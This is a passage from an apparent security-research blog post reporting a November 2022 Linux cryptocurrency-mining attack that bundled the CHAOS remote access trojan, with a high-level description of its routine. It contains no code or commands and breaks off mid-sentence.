Linux Cryptocurrency Mining Attacks Enhanced via CHAOS RAT
We intercepted a cryptocurrency mining attack that incorporated an advanced remote access trojan (RAT) named the CHAOS Remote Administrative Tool.
We’ve previously written about cryptojacking scenarios involving Linux machines and specific cloud computing instances being targeted by threat actors active in this space such as TeamTNT. We found that the routines and chain of events were fairly similar even if it involved different threat actors: the initial phase saw attackers trying to kill off competing malware, security products, and other cloud middleware. This was followed by routines for persistence and payload execution, which in most cases is a Monero (XMR) cryptocurrency miner. For more sophisticated threats, we also observed capabilities that allowed it to spread to more devices.
In November 2022, we intercepted a threat that had a slightly different routine and incorporated an advanced remote access trojan (RAT) named the CHAOS Remote Administrative Tool (Trojan.Linux.CHAOSRAT), which is based on an open source project.
Note that the original flow involving the termination of competing malware such as Kinsing and the killing of resources that influence cryptocurrency mining performance remained unchanged.
The malware achieves its